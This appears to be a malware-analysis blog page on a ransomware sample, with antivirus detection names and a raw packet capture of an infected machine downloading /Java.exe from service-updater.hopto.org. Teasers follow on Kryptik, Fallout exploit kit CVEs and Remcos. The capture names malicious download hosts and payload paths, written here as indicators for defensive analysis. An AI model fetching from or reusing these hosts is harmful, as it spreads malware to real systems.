Avast
FileRepMetagen [Malware]
AVG
FileRepMetagen [Malware]
Avira (no cloud)
Malwarebytes
Ransom.Jigsaw
McAfee-GW-Edition
BehavesLike.Win32.Ransomware.dc
Microsoft
Trojan:Win32/Occamy.C
When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below:
2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)
E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a..
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4f^@…H…V.)a…!.Pp……… ..s…………..
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
E..(f_@…H…V.)a…!.Pp…zMk.P.@………..
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [P.], seq 1:408, ack 1, win 16415, length 407: HTTP: GET /Java.exe HTTP/1.1
E…f`@…G3..V.)a…!.Pp…zMk.P.@…..GET /Java.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: service-updater.hopto.org
Connection: Keep-Alive
2020-05-01 16:19:10.205818 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], ack 408, win 256, length 0
E..(Q.@...{)a….V..P.!zMk.p.._P…Me…….. 2020-05-01 16:19:10.227305 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], seq 1:1341, ack 408, win 256, length 1340: HTTP: HTTP/1.1 200 OK E..dQ.@...>)a….V..P.!zMk.p.._P…….HTTP/1.1 200 OK
Date: Fri, 01 May 2020 20:19:30 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
Last-Modified: Fri, 01 May 2020 01:06:35 GMT
ETag: “48e00-5a48bcaeea16d”
Accept-Ranges: bytes
Content-Length: 298496
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2020-05-01 16:23:07.891876 IP 192.168.86.25.50993 > 172.217.13.227.80: Flags [P.], seq 1:560, ack 1, win 16560, length 559: HTTP: POST /service/update2?cup2key=10:78626
2356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
E..Wg.@…….V……1.P…I..T.P.@..k..POST /service/update2?cup2key=10:786262356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.35.452;winhttp;cup-ecdsa
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.35.452
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1097
Host: update.googleapis.com
Written By
What Kryptik virus can do? Executable code extractionAttempts to connect to a dead IP:Port (1 unique times)Creates RWX memoryA process attempted to delay the analysis task.Expresses interest in specific running processesHTTP traffic contains suspicious features which may be indicative of malware related trafficPerforms some HTTP requestsThe binary likely contains encrypted or compressed da...
2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1E…]R@….J..V.]~<m._.P+…80..P.@t….GET /2.exe HTTP/1.1Accept: image/jpeg, application/x-ms-application, im...
Fallout Exploit Kit is back and targeting the following CVE's as of 4-8-2020: Vulnerabilities CVE-2018-4878CVE-2018-15982CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop - RansomwareGandCr...
Remcos is a RAT type malware which means that attackers use it to perform actions on infected machines remotely. This malware is extremely actively caped up to date with updates coming out almost every single month. TypeTrojan Originex-USSR territory&...